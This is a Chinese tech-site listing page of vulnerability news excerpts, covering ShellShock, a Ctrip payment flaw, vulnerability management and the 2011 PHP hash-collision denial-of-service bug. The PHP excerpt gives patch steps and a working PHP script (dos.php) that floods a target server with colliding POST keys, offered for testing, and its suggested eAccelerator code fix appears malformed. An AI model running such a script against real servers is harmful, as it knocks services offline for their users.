技术改变世界 阅读塑造人生! - shaogx.com

This string was altered by TechBlog\Plugins\Example.; This is an example to show the potential of an offcanvas layout pattern in Bootstrap. Try some responsive-range viewport sizes to see it in action.

漏洞的基本知识

在迈克菲实验室(McAfeeLabs)的威胁警告中,漏洞这个字眼几乎随处可见。无论是发现了一个“漏洞”,还是在某些版本中存在“漏洞”,这样的描述都司空见惯。那么,究竟什么是“漏洞”?漏洞是一种在某些情况下会导致程序错误运行的程序错误(bug)。攻击者常常会利用漏洞来滥用程序实施破坏。... 全文

本地漏洞 远程漏洞 高风险漏洞 中等风险漏洞 低风险漏洞

美国漏洞管理库发布Bash漏洞最新概要

NVD(National Vulnerability Database)是美国政府基于漏洞管理数据的标准知识库,这些数据支持自动化漏洞管理和安全测试,并遵循美国联邦信息安全管理法案(FISMA)。最近美国国家网络感知系统发布了一项针对“CVE-2014-6271 bash远程命令执行漏洞(ShellShock破壳)”的概要,“破壳”漏洞远胜“心脏出血”,看来实至名归。... 全文

Bash漏洞 ShellShock 漏洞管理

携程为支付漏洞致歉:称漏洞已修复

关于22日爆出“支付漏洞”一事,携程有关人士23日在接受新华社记者采访时坦言,携程在技术调试过程中出现短时漏洞,经技术排查,漏洞已修复,经排查,没有恶意下载相关数据情况发生,目前也没有出现用户信用卡被盗刷。携程致歉并承诺,未来倘若发生安全漏洞并引起用户损失,携程将给予全额赔付。... 全文

携程漏洞 乌云漏洞平台

企业安全管理:整合漏洞管理到开发过程

软件开发人员也是人,这就是说,高级的应用程序代码也可能包含错误和漏洞。因此,每个软件开发过程都应该对新应用程序代码进行漏洞扫描。但并不是所有开发人员都采取相同的方式来发现漏洞,并且很少有开发人员能够捕捉所有代码漏洞。  ... 全文

漏洞管理 漏洞扫描 漏洞

高校虚拟化环境下的主机漏洞防护浅析

福建中医药大学原名福建中医学院,创建于1958年,是我国创办较早的高等中医药院校之一,是福建省重点建设高校,2010年3月经教育部批准更名为福建中医药大学。学校拥有国家中医药管理局重点学科20个,福建省重点学科12个。... 全文

主机漏洞 主机漏洞防护 漏洞

软件漏洞分析的八大技巧汇总(1)

在日常分析软件漏洞时,经常需要耗费比较长的分析时间,少则几小时,多则数天,甚至更久。因此,经常总结一些分析技巧是非常有必要的,针对不同的漏洞类型采取不同的分析思路和技巧,可以有效地提高分析速度。对于一些被曝出来的热门0day,网上一般都会有分析文章,但一般都是“结论性分析”,也就是直接帖漏洞代码,指出哪里出错,而非“思路性分析”。如果你经常分析漏洞的话,会发现占用你分析时间的往往不是分析漏洞代码,而是定位漏洞代码。所以说,调试分析漏洞有时就是看下断点下得准不,再加上一些胡猜乱想来推测,最后才是分析漏洞代码了,如果熟悉汇编指令,这个就不是问题了。... 全文

软件漏洞 漏洞分析 漏洞代码

修复php

前日有信息显示当前包括PHP、Java、Ruby在内的很多语言版本存在漏洞,PHP官方开发组成员Laruence(新浪微博)表示攻击者可以通过构造Hash冲突实现拒绝服务攻击,并提供了实例。这个攻击方法危害很高,攻击成本也很小,一个台式机可以轻松搞垮数十台、上百台服务器。 此漏洞一出,相当于随便一个攻击者就可以DDoS掉世界上的大部分网站!危害等级绝对是核弹级别。因此,PHP官方开发组紧急发布了补丁,请大家尽速修补。 PHP方面,<= 5.3.8, <= 5.4.0RC3的所有版本均会受此漏洞影响。PHP 5.3.9和PHP 5.4.0已经包含了针对此漏洞的补丁,但由于两个版本目前仍然在RC状态,无法用于生产服务器升级。至于PHP 5.2,官方开发组表示不会为了这个漏洞发布新版。官方目前提供的解决方案是给自己的PHP环境打一个Patch,5.2和5.3都可以使用。Patch地址如下: https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars 使用方法: 1. cd 到 php src,运行: patch -p1 < php-5.2.*-max-input-vars.patch 2. 最新的 PHP 5.3.9-RC4 已经修复了本漏洞,5.3 的用户可以直接升级到 5.3.9-RC4 。 当然,如果您不想更新到一个RC版本,那么也可以很简单的修改上面这个补丁,应用到 5.3 的相应版本上。 Laruence还建议其他语言java, ruby等,请各位也预先想好对策,限制post_size是治标不治本的方法,不过可以用来做临时解决方案。 临时解决方案参考:五四陈科学院 此外,微软也已经紧急发布了更新,修复了ASP.net上的该漏洞: 查询清单 目前已知的受影响的语言以及版本有:: ·  Java, 所有版本 ·  JRuby <= 1.6.5 ·  PHP <= 5.3.8, <= 5.4.0RC3 ·  Python, 所有版本 ·  Rubinius, 所有版本 ·  Ruby <= 1.8.7-p356 ·  Apache Geronimo, 所有版本 ·  Apache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22 ·  Oracle Glassfish <= 3.1.1 ·  Jetty, 所有版本 ·  Plone, 所有版本 ·  Rack, 所有版本 ·  V8 JavaScript Engine, 所有版本 不受此影响的语言或者修复版本的语言有:: ·  PHP >= 5.3.9, >= 5.4.0RC4 ·  JRuby >= 1.6.5.1 ·  Ruby >= 1.8.7-p357, 1.9.x ·  Apache Tomcat >= 5.5.35, >= 6.0.35, >= 7.0.23 ·  Oracle Glassfish, N/A (Oracle reports that the issue is fixed in the main codeline and scheduled for a future CPU) ·  CVE: CVE-2011-4885 (PHP), CVE-2011-4461 (Jetty), CVE-2011-4838 (JRuby), CVE-2011-4462 (Plone), CVE-2011-4815 (Ruby) 修补步骤: 提示:在修复之前,可以按照下面 测试步骤 模拟攻击一次,看看效果 1、 下载补丁包https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars 2、cd 到php安装的源码包目录(安装php时释放的目录,已configure过的,在这里就不用configure了,直接make && make install) 3、 打补丁patch -p1 < php-5.2.*-max-input-vars.patch 4、 make && make install  注意备份原程序! 5、 安装完后,重启php即可  问题处理:打上临时补丁后,发现eAccelerator不好使了。执行php -v 会提示[eAccelerator] This build of "eAccelerator" was compiled for PHP version 5.2.17. Rebuild it for your PHP version (5.2.17p1) or download precompiled binaries.主要是因为php版本号改变了导致eAccelerator报错。找了一下eAccelerator的源码,发现是eaccelerator.c文件中,有检查php版本号的代码,主要是encode_version这个函数,找到 } else if (strncasecmp(buf, "beta", 4) == 0) {          a = 3;         sscanf(buf, "beta%u", &b); }  这行,在下面添加如下代码  } else if (buf, "p1%u", &b) {        a = 0;        b = 0; } 提示:文中提到的ea版本是0.9.6.1+ 的,每个版本的代码可能不一样,选择这个可以解决问题 重新编译eAccelerator,再次执行 php -v,已无报错,重启cgi,eAccelerator目录已有重新重成的文件, 测试步骤:1、服务器端不需任何配置,在攻击机放置一个dos.php文件,内容如下: <?php $host = 'http://www.xxx.org/index.php'; 修改为服务器任何一个可以访问的php文件 $data = ''; $size = pow(2, 15);   for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size) { $data .= '&array[' . $key . ']=0'; }  $ret = curl($host, ltrim($data,'&')); var_dump($ret); function curl($url, $post, $timeout = 30){     $ch = curl_init();     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);     curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);     curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));     curl_setopt($ch, CURLOPT_URL, $url);     curl_setopt($ch, CURLOPT_POST, true);     curl_setopt($ch, CURLOPT_POSTFIELDS, $post);     $output = curl_exec($ch);     if ($output === false) return false;     $info = curl_getinfo($ch);     $http_code = $info['http_code'];     if ($http_code == 404) return false;     curl_close($ch);     return $output; } ?>  2、运行这个脚本即可,注意观察被攻击的服务器cpu利用率(top指令)。     ... 全文

php漏洞 hash漏洞 php-5.2漏洞 phphash漏洞 eaccelerato

如何选择一款web漏洞扫描器

对于正在评估web漏洞扫描器的人应该读读这篇访谈文章。在这篇访谈中,我们谈论了选择web漏洞扫描器的过程以及在选择的过程中应该注意的因素。最好的web漏洞扫描器应该是什么样的?... 全文

web漏洞 漏洞扫描器 web漏洞扫描器

Android 4.4出现漏洞 黑客能远程遥控手机

在Android系统中,Master Key漏洞可以说是最常见的一个,黑客们可以通过这个漏洞通过远程遥控的方式操控用户的Android系统及他们的设备。之前在各个版本的Android系统中,Master Key漏洞都曾经出现过。而现在似乎在最新的Android 4.4 KitKat操作系统中又出现了新的变种漏洞,同样是一种非常严重的Mater Key漏洞。... 全文

Android漏洞 漏洞 Mater Key漏洞

一周安全要闻:Windows曝0day SSL又出新漏洞

支付卡漏洞、Heartbleed漏洞以及前不久曝光的Shellshock漏洞,让人们深深意识到信息安全形势的严峻。然而一波未平一波又起,上周又曝出了俄罗斯黑客利用微软Windows系统中的漏洞对欧美国家政府、北约,以及乌克兰政府展开间谍活动。报告称,俄罗斯黑客攻击的目标还包括欧洲的能源和电信行业公司,以及美国一些未披露的学术机构。... 全文

Windows漏洞 0day漏洞 SSL漏洞

MD5哈希漏洞成为高危Web安全漏洞

信息安全行业的一位首席Web安全专家称,一年多前发现的哈希算法漏洞可能成为Web上最危险的安全漏洞。在2010 RSA大会上,WhiteHat首席安全技术官Jeremiah Grossman正式提出去年中排名前十位的网络黑客攻击技术。一月份,Grossman首次在其博客上列出这一第四年度列表,他试图阐明那些往往不会引起人注意但有重大意义的攻击研究。排在这一列表首位的是创建流氓认证职权的实现,这有效地击败了因特网的信任基础设施,并使用户难以获知哪个站点和证书是可信的。... 全文

MD5哈希漏洞 Web安全漏洞 网络黑客技术 浏览器

微软发现应用漏洞增加

根据微软最新威胁报告显示,应用漏洞在过去几年的稳步下降后,2012年又开始呈上升趋势,很多针对编码错误的漏洞利用都是使用自动攻击工具包。... 全文

应用漏洞 漏洞

防患未然:建立漏洞管理过程

在安全问题上,绝不存在任何完美的网络和应用。检测网络防御中的重要漏洞未必是一个昂贵复杂的任务。如果企业愿意,当然可以花大把的钱去构建一个强健的、实时的网络漏洞管理机制,但这并非上策。根据公司需要保护的资产类型及资产的所在位置,甲公司的网络漏洞管理可能与乙公司的网络漏洞管理看似迥然不同。任何时候都不存在什么模板或最佳方法可以保护公司免受每种漏洞的威胁。但只要企业认真计划,就完全可以将漏洞管理转变成一个有益于确认并解决潜在安全漏洞的过程。本文将探讨如何构建有效的网络漏洞评估和漏洞管理的工具和最佳方法。... 全文

漏洞管理 漏洞

解析漏洞管理的五个阶段

很多人应该都记得2003年“蠕虫的一年”,在那年的1月25日,我们看到了SQL Slammer蠕虫攻下了整个美国的自动提款机,同时感染了全球范围内数百万台个人电脑和服务器,该蠕虫病毒利用了微软SQL服务器中的漏洞,事实上,微软早在攻击发生前的六个月就已经发布了这个修复程序。... 全文

漏洞管理 漏洞

BASH漏洞初挖掘

最近,BASH爆出来一个远程代码执行的漏洞CVE-2014-6271。BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令!例如目前,接受HTTP命令的CGI Shell脚本是最主要的被攻击对象。一个常见的HTTP请求是这样:... 全文

bash 安全漏洞 bash漏洞

暗藏漏洞 Hotmail邮件信息遭窃

北京时间5月25日消息,微软网站被披露存在一个可能致使黑客可以阅读和窃取Hotmail用户电子邮件的漏洞。据悉,最早发现这一漏洞的是信息安全厂商趋势科技,他们声称在今年5月12日,发现了一封给台湾Hotmail用户的欺诈邮件,邮件内容为虚假的警告。... 全文

Hotmail漏洞 邮件漏洞

全面扫描校园网漏洞(2)

漏洞扫描主要通过以下两种方法来检查目标主机是否存在漏洞:首先进行端口扫描,得知目标主机开启的端口以及端口上运行的网络服务,将这些相关信息与网络漏洞扫描系统提供的漏洞库进行匹配,查看是否有满足匹配条件的漏洞存在。或是通过模拟黑客的攻击手法,对目标主机系统进行攻击性的安全漏洞扫描,若模拟攻击成功,则表明目标主机系统存在安全漏洞。一次完整的网络漏洞扫描分为3个阶段:第1阶段:发现目标主机或网络。第2阶段:发现目标后进一步搜集目标信息,包括操作系统类型、运行的服务以及服务软件的版本等。第3阶段:根据搜集到的信息判断或者进一步测试系统是否存在安全漏洞。... 全文

漏洞 漏洞扫描

三谈企业漏洞收集平台建设

写《浅谈企业漏洞收集平台建设》时候就想要找黑锅审一下,因为担心我对黑锅观点的理解不够透彻,毕竟技术水平差距在那边,理解不到位也很正常。结果那天晚上写完一下就发了。今天黑锅看完以后表示我还是没有理解清楚有偏差,于是大笔一挥来一篇《再谈企业漏洞收集平台建设》。晚上到家才看见,迅速读完以后感觉松了一口气。应该说黑锅还是认可我的观点的。可是为什么还要写这篇三谈:... 全文

企业漏洞 漏洞收集

Java最新版本又现漏洞

近日,波兰安全公司Security Explorations发表报告称,他们在Java中发现了两个新的漏洞”issue 54″和”issue 55″,两个漏洞结合起来,可以完美绕过Java的沙盒防御机制。... 全文

Java漏洞 漏洞 Java

专题:那些年一起补过的漏洞

window.location.href='http://netsecurity.51cto.com/art/201405/440032.htm';【责任编辑:蓝雨泪 TEL:(010)68476606】... 全文

漏洞 安全漏洞

2 3 4 5 6 7 8 9 10 11